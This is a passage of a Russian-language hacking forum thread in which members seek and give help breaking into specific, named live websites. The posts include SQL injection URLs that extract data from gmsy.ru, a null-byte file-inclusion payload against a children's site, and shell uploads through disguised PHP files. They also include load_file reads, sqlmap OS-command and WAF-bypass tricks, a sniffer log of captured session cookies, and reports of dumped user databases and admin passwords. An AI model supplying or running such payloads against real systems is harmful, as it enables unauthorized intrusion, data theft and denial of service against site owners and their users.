Просмотр полной версии : Ваши вопросы по уязвимостям.
Страницы :
1
2
[
3]
4
5
6
7
8
9
10
11
12
SaNDER said:
↑ (https://antichat.live/posts/3885217/)
Но там уже каракули,но пароль ввести можно было,но даже с верным паролем зайти не получалось .
Вы видите только HTML форму с вводом пароля, не более.
PHP не интерпретируется, поэтому и не пускает.
Multiple cross-site request forgery (CSRF) vulnerabilities in the setup process in phpMyAdmin 4.0.x before 4.0.10.10, 4.2.x before 4.2.13.3, 4.3.x before 4.3.13.1, and 4.4.x before 4.4.6.1 allow remote attackers to hijack the authentication of administrators for requests that modify the configuration file.
CVE-2015-3902
Хотел спросить это включительно с 4.0.10.10
-$formset_id = filter_input(INPUT_GET, 'formset');
-$mode = filter_input(INPUT_GET, 'mode');
Некорректно задан набор форм, проверьте массив $formsets в файле setup/frames/form.inc.php
как можно применить даную уязвимость пните меня пожайлуста...
и ище в setup активная загрузка и сохранения может как-то можно применить
zifus said:
↑ (https://antichat.live/posts/3885478/)
Multiple cross-site request forgery (CSRF) vulnerabilities in the setup process in phpMyAdmin 4.0.x before 4.0.10.10, 4.2.x before 4.2.13.3, 4.3.x before 4.3.13.1, and 4.4.x before 4.4.6.1 allow remote attackers to hijack the authentication of administrators for requests that modify the configuration file.
CVE-2015-3902
Хотел спросить это включительно с 4.0.10.10
-$formset_id = filter_input(INPUT_GET, 'formset');
-$mode = filter_input(INPUT_GET, 'mode');
Некорректно задан набор форм, проверьте массив $formsets в файле setup/frames/form.inc.php
как можно применить даную уязвимость пните меня пожайлуста...
и ище в setup активная загрузка и сохранения может как-то можно применить
Да там токо чтение.и установка,вот если б ты мог загружать на сервер файлы,тогда что-то бы ещё и вышло .
Скинь в личку,порыскаем .
Вообщем я не кому нечего не скидывал,но вдруг своими ошарашенными глазами увидел логи чужого чела на своём сниффере .
Вот
Code:
IP адрес : ***.**.***.***; Хост : ***.***.**.***.******.ru; Дата : 02:24:57-29.08.15
Браузер : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Удаленный порт : 30706; Тип соединения : keep-alive
Откуда пришёл : http://*****.ru
Строка запроса : PHPSESSID=типо сессия
jv_enter_ts_TfUQ5fJwAe=1440835166178
jv_visits_count_TfUQ5fJwAe=1
jv_pages_count_TfUQ5fJwAe=13
jv_sess_id_TfUQ5fJwAe=s66c789657b7fc3e21b56b95fc8e 37b94
jv_client_id_TfUQ5fJwAe=2252.OeS99jWigEYkTc3eTutWX W0E2qPYvFoxnk0mVqDh0aA
jv_invitation_time_TfUQ5fJwAe=1440857921737
jv_close_time_TfUQ5fJwAe=1440857926052
jv_gui_state_TfUQ5fJwAe=WIDGET
_ym_visorc_31124201=w[/B]
Реально ли подменить куки,и если да,то как ? .
[/LEFT]
Доброго времени суток. Прошу помощи с этим:
*****.ru/results/?ppage=1
так /?ppage=-1 эрор
Code:
Db failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 1
так /?ppage=999 пусто
так /?ppage=1' вывод без изменений
манипуляции
/?ppage=1*2 выводит /?ppage=1
/?ppage=2-1 выводит /?ppage=2
Можно ли тут что то сделать или нет уязвимости?
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission
Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт
Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону еще посмотреть.
kingbeef
30.08.2015, 12:12
Ну если сайт самописный, то это к ванге.
rct said:
↑ (https://antichat.live/posts/3885760/)
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission
Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт
Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону
еще посмотреть.
Я конечно в этом не разбираюсь,но вот у меня в админке вот так
http://****.*****.com/admin/edit_app.php? (http://****.*****.com/admin/edit_app.php)appid=1260 .
Если у тебя в админке подобное есть,замени число в id на 15.и может прокатит .
Я понимаю что это как на кофейной гуще гадать, но хоть какую-то зацепку бы.
SaNDER said:
↑ (https://antichat.live/posts/3885776/)
Я конечно в этом не разбираюсь,но вот у меня в админке вот так
http://****.*****.com/admin/edit_app.php? (http://****.*****.com/admin/edit_app.php)
appid=1260 .
Если у тебя в админке подобное есть,замени число в id на 15.и может прокатит .
Суть ясна, но не катит. Например 10 что под админом, что разлогиненым рубрика "Объявления".
Вопрос :вот сайт http://www.zet-obuv.ru и если в него вбить "<>script>alert("WH")
то окошко не появляется,но зато он вбивается под строку "поиск" .
Считается ли это XSS уязвимостью? .
WallHack
30.08.2015, 20:35
SaNDER said:
↑ (https://antichat.live/posts/3885916/)
Вопрос :вот сайт
http://www.zet-obuv.ru
и если в него вбить "<>script>alert("WH")
то окошко не появляется,но зато он вбивается под строку "поиск" .
Считается ли это XSS уязвимостью? .
Пасивная xss ">
[QUOTE="WallHack"]
WallHack said:
↑ (https://antichat.live/posts/3885934/)
Пасивная xss ">
rct said:
↑ (https://antichat.live/posts/3885760/)
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission
Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт
Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону еще посмотреть.
Я делал следующим образом.
Сливал ВСЮ базу данных и искал ссылки на админку в ней.
Сканировал сканеров директории.
Так же если известны пути, попробуй залить шелл командой "--os-cmd=ls"
Уязвимый запрос uname=test&pass=test&op=login' - белая страница. Хочу раскрутить с помощью sqlmap
Как это сделать, то есть как разработать дыру? И правильный ли запрос будет есть поставить так?
Code:
POST /user.php HTTP/1.1
Host: www.site.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.ru/user.php
Cookie: PHPSESSID=aapqqk2jgl0tvirul3g34cmee5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
[code]
[code]------Exploit_Code
Content-Disposition: form-data; name="authorize"
1
------Exploit_Code
Content-Disposition: form-data; name="login"
test
------Exploit_Code
Content-Disposition: form-data; name="password"
test
------Exploit_Code--
Content-Disposition: form-data; name="login"
WallHack
31.08.2015, 11:53
SaNDER said:
↑ (https://antichat.live/posts/3885961/)
а к чему твой скрипт,он не пашет на этом сайте,по крайне мере у меня нечего нету,юза мозиллу .
Появляется пустое изображение ! Значит там уязвимость...
Почитай статьи
Muracha said:
↑ (https://antichat.live/posts/3886023/)
попробуй залить шелл командой "--os-cmd=ls"
Нет прав на запись
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
нужно найти эту админку.
rct said:
↑ (https://antichat.live/posts/3886090/)
Нет прав на запись
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
нужно найти эту админку.
ArxScanSite 3 (http://softxaker.ru/go?a%3AaHR0cDovL2ZpbGVzLmhhY2tlci1sYWIuY29tL2ZpbGV zL3VobVNFZXJxMTM0NTE4NDk1MC5odG1s) тебе в помощь. Или иные сканеры директории
Siqvik said:
↑ (https://antichat.live/posts/3885724/)
Доброго времени суток. Прошу помощи с этим:
*****.ru/results/?ppage=1
так /?ppage=-1 эрор
Code:
Db failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 1
так /?ppage=999 пусто
так /?ppage=1' вывод без изменений
манипуляции
/?ppage=1*2 выводит /?ppage=1
/?ppage=2-1 выводит /?ppage=2
Можно ли тут что то сделать или нет уязвимости?
Увы,но тут intval($_GET[ppage])
Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела?
Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html
rct said:
↑ (https://antichat.live/posts/3886230/)
Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела?
Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html
А ваша инъекция позволит вам перезаписать этот скрипт? не думаю.
Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете.
Ищите админку или показывайте сайт, другие помогут.
Нашёл сайт который позволяет заливать свое звуковое оповещение,я залил .php файл с таким названием shell.mp3.php .
Удивительно,но он его принял .
Токо не не знаю куда он делся.
На этот случай включил Tamper Data во время заливки
http://******.ru/user/upload_sound.php
При открытии страницы браузер Mozilla FireFox выдаёт следущее :
Code:
[/B][/B][/B][/B][/B][/B][/B][/B][/B]
[B][B][B][B][B][B][B][B][B]Неверное перенаправление на странице
Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится.
Эта проблема может возникать при отключении или запрещении принятия кук.
Можно ли как-то это обойти .
И даже если обойду как в шелл то попасть .
Страница где я заливал шелл выглядел так :
Code:
http://www.*****.ru/index.php?page=6[code]
Вот POST DATA :
[code]-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"\r\n\r\n0\r\n-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"; filename="shell.mp3.php"\r\nContent-Type: application/octet-stream\r\n\r\n3R½¿¡¹cøNs@Éplò)¿¤fæ"áÒ¸ÄuàÒ¡F+"»1»¾j0ÙÈ0T7bì¢Dä
На это [ B ] [ /B ] [ CODE ] [ /CODE ] не обращайте внимание .
Я хз что это,но я это нашёл .
Code:
var PMA_gotoWhitelist = new Array();
PMA_gotoWhitelist[0]="db_create.php";
PMA_gotoWhitelist[1]="db_datadict.php";
PMA_gotoWhitelist[2]="db_sql.php";
PMA_gotoWhitelist[3]="db_events.php";
PMA_gotoWhitelist[4]="db_export.php";
PMA_gotoWhitelist[5]="db_importdocsql.php";
PMA_gotoWhitelist[6]="db_qbe.php";
PMA_gotoWhitelist[7]="db_structure.php";
PMA_gotoWhitelist[8]="db_import.php";
PMA_gotoWhitelist[9]="db_operations.php";
PMA_gotoWhitelist[10]="db_printview.php";
PMA_gotoWhitelist[11]="db_search.php";
PMA_gotoWhitelist[12]="db_routines.php";
PMA_gotoWhitelist[13]="export.php";
PMA_gotoWhitelist[14]="import.php";
PMA_gotoWhitelist[15]="index.php";
PMA_gotoWhitelist[16]="pdf_pages.php";
PMA_gotoWhitelist[17]="pdf_schema.php";
PMA_gotoWhitelist[18]="querywindow.php";
PMA_gotoWhitelist[19]="server_binlog.php";
PMA_gotoWhitelist[20]="server_collations.php";
PMA_gotoWhitelist[21]="server_databases.php";
PMA_gotoWhitelist[22]="server_engines.php";
PMA_gotoWhitelist[23]="server_export.php";
PMA_gotoWhitelist[24]="server_import.php";
PMA_gotoWhitelist[25]="server_privileges.php";
PMA_gotoWhitelist[26]="server_sql.php";
PMA_gotoWhitelist[27]="server_status.php";
PMA_gotoWhitelist[28]="server_status_advisor.php";
PMA_gotoWhitelist[29]="server_status_monitor.php";
PMA_gotoWhitelist[30]="server_status_queries.php";
PMA_gotoWhitelist[31]="server_status_variables.php";
PMA_gotoWhitelist[32]="server_variables.php";
PMA_gotoWhitelist[33]="sql.php";
PMA_gotoWhitelist[34]="tbl_addfield.php";
PMA_gotoWhitelist[35]="tbl_change.php";
PMA_gotoWhitelist[36]="tbl_create.php";
PMA_gotoWhitelist[37]="tbl_import.php";
PMA_gotoWhitelist[38]="tbl_indexes.php";
PMA_gotoWhitelist[39]="tbl_move_copy.php";
PMA_gotoWhitelist[40]="tbl_printview.php";
PMA_gotoWhitelist[41]="tbl_sql.php";
PMA_gotoWhitelist[42]="tbl_export.php";
PMA_gotoWhitelist[43]="tbl_operations.php";
PMA_gotoWhitelist[44]="tbl_structure.php";
PMA_gotoWhitelist[45]="tbl_relation.php";
PMA_gotoWhitelist[46]="tbl_replace.php";
PMA_gotoWhitelist[47]="tbl_row_action.php";
PMA_gotoWhitelist[48]="tbl_select.php";
PMA_gotoWhitelist[49]="tbl_zoom_select.php";
PMA_gotoWhitelist[50]="transformation_overview.php";
PMA_gotoWhitelist[51]="transformation_wrapper.php";
PMA_gotoWhitelist[52]="user_password.php";
Br@!ns said:
↑ (https://antichat.live/posts/3886375/)
А ваша инъекция позволит вам перезаписать этот скрипт? не думаю.
Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете.
Ищите админку или показывайте сайт, другие помогут.
Данный скрипт находится в cs2 => cs_user_sites
А вот SCHEMA_PRIVILEGES
Code:
GRANTEE IS_GRANTABLE TABLE_SCHEMA TABLE_CATALOG PRIVILEGE_TYPE
'csuser'@'localhost' NO cs2 NULL SELECT
'csuser'@'localhost' NO cs2 NULL INSERT
'csuser'@'localhost' NO cs2 NULL UPDATE
'csuser'@'localhost' NO cs2 NULL DELETE
'csuser'@'localhost' NO cs2 NULL CREATE
'csuser'@'localhost' NO cs2 NULL DROP
'csuser'@'localhost' NO cs2 NULL INDEX
'csuser'@'localhost' NO cs2 NULL ALTER
'csuser'@'localhost' NO cs2 NULL CREATE TEMPORARY TA…
'csuser'@'localhost' NO cs2 NULL EXECUTE
'csuser'@'localhost' NO cs2 NULL CREATE VIEW
'csuser'@'localhost' NO cs2 NULL SHOW VIEW
'csuser'@'localhost' NO cs2 NULL CREATE ROUTINE
'csuser'@'localhost' NO cs2 NULL ALTER ROUTINE
'csuser'@'localhost' NO cs2 NULL EVENT
'csuser'@'localhost' NO cs2 NULL TRIGGER
По всему выходит что могу. Пока не пробовал, усиленно курю маны по пхп и sql =)
Прошу помощи.
Есть доступ к админке и базе данных.Пытаюсь залить шелл через загрузку картинок.Обычная картинка загружается без проблем и через tamper data расширение без проблем меняется на php.
Если в картинку вставить php код то ничего не загружается.Фильтрует где то php код
SaNDER said:
↑ (https://antichat.live/posts/3886419/)
Дак если поменял расширение и шелл залился заходи в него и твори чудеса .
Я делал так заливал shell.jpg и потом вмешался с помощью tamper data и поменял расширение на .php .
Можно ещё .htacces юзать если прокатит .
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
if (false != imagecreatefromstring($img) && stripos($img, '
[QUOTE="hakwar"]
hakwar said:
↑ (https://antichat.live/posts/3886500/)
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
if (false != imagecreatefromstring($img) && stripos($img, '
На сайте могу выполнять команды типа SELECT @@VERSION . Где можно найти подобные команды ?
Или предоставьте сюда список пожалуйста .
BabaDook
01.09.2015, 20:58
Вечер добрый
Почему тут не могу прочитать index
http://pbskids.org/wilsonandditch/games/?game=../index точнее там хрень сказочная
Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?
[QUOTE="hakwar"]
hakwar said:
↑ (https://antichat.live/posts/3886416/)
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
if (false != imagecreatefromstring($img) && stripos($img, '
...
[/CODE]
BabaDook
02.09.2015, 00:59
Siqvik said:
↑ (https://antichat.live/posts/3886626/)
Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?
да , может
BabaDook said:
↑ (https://antichat.live/posts/3886642/)
да , может
Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет?
И еще интересует атака под названием "Slow HTTP DOS". Акунетикс показывает наличие такой уязвимости, хотелось бы инфы хоть какой то, поиск ничего толкового не дал, а на забугорных ресурсах как то совсем заумно, общие черты понял а вот как это дело осуществить так и не понял, есть ли софт какой под окна? Направьте на путь истинный =)) с инфой пожалста =)
BabaDook
02.09.2015, 01:34
Siqvik said:
↑ (https://antichat.live/posts/3886645/)
Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет?
это своего рода Дос атака . Связана с тем что паук крауль, то что делает карту сети, ходит по сайту, запрашивает страницу. идёт нагрузка на слабенткий хост
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...
3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
Заранее спасибо!
BabaDook said:
↑ (https://antichat.live/posts/3886568/)
Вечер добрый
Почему тут не могу прочитать index
http://pbskids.org/wilsonandditch/games/?game=../index
точнее там хрень сказочная
game=../index.php%00
Дописываемое расширение - не php.
BabaDook
02.09.2015, 12:55
XAMEHA said:
↑ (https://antichat.live/posts/3886743/)
game=../index.php%00
Дописываемое расширение - не php.
Ух ты, спасибо. что-то я об этом не подумал
ubepkr said:
↑ (https://antichat.live/posts/3886739/)
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...
3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
Заранее спасибо!
через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа "
Can not load or save configuration
Please create web server writable folder config in phpMyAdmin toplevel directory as described in documentation (http://nevzorov.tv/phpmyadmin/Documentation.html#setup_script). Otherwise you will be only able to download or display it"
То значит майадмин ставили не через браузер и прав нет на создание и запись файлов.
Ищи другие методы.
Muracha said:
↑ (https://antichat.live/posts/3886925/)
через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа "
Can not load or save configuration
Please create web server writable folder config in phpMyAdmin toplevel directory as described in
documentation (http://nevzorov.tv/phpmyadmin/Documentation.html#setup_script)
. Otherwise you will be only able to download or display it"
То значит майадмин ставили не через браузер и прав нет на создание и запись файлов.
Ищи другие методы.
Спасибо, именно такая загогулина и присутствует, к сожалению. А другой админки не может быть (а эта-типа заманухи)?
И другие вопросы тоже актуальны))
ubepkr said:
↑ (https://antichat.live/posts/3886739/)
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...
3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
Заранее спасибо!
По первому пункту
http://php.net/manual/en/reserved.variables.server.php
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
Это твои ip, а сервер addr - адрес сервера.
Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.
Нужно сканировать, чтобы найти ее. сканером директории.
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)
------------------------
Теперь у меня самого вопрос.
Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...
BabaDook
03.09.2015, 11:22
Muracha said:
↑ (https://antichat.live/posts/3887034/)
Это твои ip, а сервер addr - адрес сервера.
может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.
Нужно сканировать, чтобы найти ее. сканером директории.
линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)
------------------------
Теперь у меня самого вопрос.
Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...
union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.
BabaDook said:
↑ (https://antichat.live/posts/3887057/)
union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.
у меня есть шелл. есть доступ к записям файлов, есть доступ к БД phpmyadmin пользователя. дело даже не в sql ini..
Использовал статью https://xakep.ru/2013/11/16/read-file-in-mysql/ но как-то грустно.
То есть не сработало.
XAMEHA said:
↑ (https://antichat.live/posts/3886635/)
Code:
...
Не пропускает....
DezMond™
04.09.2015, 13:47
Как в sqlmap заменить union на /*!12345uNIoN*/
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Как заюзать?
DezMond™ said:
↑ (https://antichat.live/posts/3887422/)
Как в sqlmap заменить union на /*!12345uNIoN*/
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Как заюзать?
Тампер-скрипты посмотрите, должен быть такой в папке /tamper.
BabaDook
05.09.2015, 00:45
YaBtr said:
↑ (https://antichat.live/posts/3887449/)
Тампер-скрипты посмотрите, должен быть такой в папке /tamper.
Я так понимаю скрипт называется unionalltounion
PHP:
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__=PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/ with /*!12345uNioN*/ /*!12345seLEcT*/
>>> tamper('-1 /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/')
'-1 /*!12345uNioN*/ /*!12345seLEcT*/'
"""
returnpayload.replace("UNION ALL SELECT","/*!12345uNioN*/ /*!12345seLEcT*/") ifpayloadelsepayload
http://gmsy.ru/games/1'
Как можно раскрутить?
gQd said:
↑ (https://antichat.live/posts/3890036/)
http://gmsy.ru/games/1
'
Как можно раскрутить?
попробуйте вектор без пробелов
gQd said:
↑ (https://antichat.live/posts/3890036/)
http://gmsy.ru/games/1
'
Как можно раскрутить?
http://gmsy.ru/games/lineage-ii-freek'+union+select+1,2,3,4,@@version,6,7,8,9+--+
скобки вроди бы фильтруются
http://gmsy.ru/games/lineage-ii-fre...+from+information_schema.tables+limit+0,1+--+ (http://gmsy.ru/games/lineage-ii-freek'+union+select+1,table_name,3,4,5,6,7,8,9+fro m+information_schema.tables+limit+0,1+--+)
На payonline.ru сканер нашёл это :
Code:
C:/Users/K9D71~1.MUR/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg
и что мне с этим делать?
и это
Code:
ppt/slides/_rels/slide8.xml
не могу построить ссылку .
http://payonline.ru/error/?aspxerrorpath=/'"-->netsparker(0x0004B4) (http://payonline.ru/error/?aspxerrorpath=/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker%280x0004B4%29%3C/scRipt%3E)
тут вообще интервал сервер еррор .
Нашёл crossdomain.xml
Code:
что это ? .
SaNDER said:
↑ (https://antichat.live/posts/3890475/)
На payonline.ru сканер нашёл это :
Code:
C:/Users/K9D71~1.MUR/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg
и что мне с этим делать?
и это
Code:
ppt/slides/_rels/slide8.xml
не могу построить ссылку .
